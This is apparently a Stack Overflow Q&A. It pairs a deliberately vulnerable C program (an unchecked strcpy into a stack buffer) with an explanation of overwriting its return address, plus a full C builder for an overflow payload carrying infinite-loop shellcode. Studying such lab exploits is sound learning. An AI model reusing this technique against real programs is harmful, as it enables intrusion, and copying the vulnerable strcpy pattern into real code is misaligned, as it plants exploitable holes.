Tags: c, stack-overflow, infinite-loop, buffer-overflow, exploit

How to do Infinite Loop


My aim is to write an infinite loop. I have to print this string "Hello World %s" infinitely, and I can only use ROP (Return-oriented programming).

gcc -fno-stack-protector loop.c -o loop  

I can compile as shown. How can I do ROP?

#include <stdio.h>
#include <string.h>

/* Deliberately vulnerable: strcpy() copies argv[1] into an 80-byte stack
   buffer without any length check, so a longer argument overwrites whatever
   sits above the buffer (saved frame pointer, return address). */
int main(int argc, char **argv){
    char buffer[80];
    strcpy(buffer, argv[1]);
    printf("Hello World %s", buffer);
    return 1;
}

Solution

  • So, the rough approach:

    buffer is located on the stack, where the return address of the main function callee is also located. Because the stack grows backwards, you can overwrite the return address, since it was appended before. The stack should look like this:

    [buffer data][ebp save][callee return address]...anything
    

    It's not certain, but pretty likely, that the callee's return address is located after the saved ebp value, which is located after the buffer data, so you would need to give an 84-byte-long array of data (not containing 0x00, because that would terminate the string) followed by the return address. The address needs to point somewhere where your "hack" is located in memory. One possible location for this would be the stack itself, so you might want to append the machine code of the infinite loop after the return address.

    It's important to note that you have to generate machine code that does not contain a null byte. An example layout of the argument string that you might give to the program should look like this:

    [84 byte data][return address][machine code]
    

    This should work on older Linux kernels. Additionally, this assumes you are working on a 32-bit system, so pointers are 4 bytes long. On a 64-bit system they would be 8 bytes.
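As an added example (not part of the question or the answer above), the following C program builds the argument string in exactly the layout the answer describes: 80 bytes of filler for the buffer, one pointer width of filler for the saved frame pointer, the return address, and then the machine code. The machine code is the two-byte x86 instruction `jmp short -2` (`eb fe`), which jumps to itself forever and contains no null byte. The address `0xbffff5c4` used in the usage line is a placeholder, not a known value: it must be the stack address at which the bytes following the return-address slot land on your system, found with a debugger. The example also assumes what the answer's "older kernels" implies, an executable stack and no ASLR (for example `gcc -m32 -fno-stack-protector -z execstack loop.c -o loop` with randomization disabled). The builder refuses any payload containing a NUL byte, since `strcpy` in the target stops copying there.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Sizes taken from the target program: char buffer[80], followed (per the
   answer) by the saved frame pointer and then main's return address. */
#define BUFFER_SIZE 80

/* Smallest x86 infinite loop: "jmp short -2", a jump to itself.
   Two bytes, neither of them 0x00, so strcpy() copies it intact. */
static const unsigned char LOOP_CODE[] = { 0xeb, 0xfe };

/*
 * Build [filler][return address][machine code] into out (capacity cap).
 *   ptr_size   4 for a 32-bit target, 8 for 64-bit: the saved ebp/rbp and
 *              the return address are each one pointer wide.
 *   code_addr  stack address at which the bytes after the return-address
 *              slot will land (hypothetical input; find it with a debugger).
 * Returns the payload length (excluding the terminating NUL), or 0 if the
 * payload does not fit or would contain a NUL byte, which strcpy() would
 * treat as the end of the string.
 */
size_t build_payload(unsigned char *out, size_t cap, size_t ptr_size, uint64_t code_addr)
{
    size_t filler = BUFFER_SIZE + ptr_size;            /* buffer + saved frame pointer */
    size_t len = filler + ptr_size + sizeof LOOP_CODE;
    if (ptr_size != 4 && ptr_size != 8) return 0;
    if (len + 1 > cap) return 0;

    memset(out, 'A', filler);                          /* runs up to the return-address slot */
    for (size_t i = 0; i < ptr_size; i++)              /* little-endian pointer */
        out[filler + i] = (unsigned char)(code_addr >> (8 * i));
    memcpy(out + filler + ptr_size, LOOP_CODE, sizeof LOOP_CODE);
    out[len] = '\0';

    /* The argv string ends at the first NUL, so an embedded NUL truncates the
       payload. A 64-bit stack address such as 0x00007ffd... always has zero
       high bytes and therefore always fails this check. */
    if (memchr(out, 0, len) != NULL) return 0;
    return len;
}

/* Write the payload to stdout so it can be passed as argv[1], e.g.
   ./loop "$(./mkpayload 0xbffff5c4 4)"   (address is a placeholder) */
int main(int argc, char **argv)
{
    unsigned char payload[256];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <hex address of shellcode on stack> [ptr_size]\n", argv[0]);
        return 1;
    }
    uint64_t addr = strtoull(argv[1], NULL, 16);
    size_t ptr_size = argc > 2 ? (size_t)strtoul(argv[2], NULL, 10) : 4;
    size_t n = build_payload(payload, sizeof payload, ptr_size, addr);
    if (n == 0) {
        fprintf(stderr, "payload does not fit or would contain a NUL byte\n");
        return 1;
    }
    fwrite(payload, 1, n, stdout);
    return 0;
}
```

The NUL check is also why the answer's layout, with the machine code after the return address, only works as written on 32-bit: a canonical 64-bit user-space stack address has two zero high bytes, so on a 64-bit target the code would have to be placed inside the buffer, before the return address, with the address as the final bytes of the string.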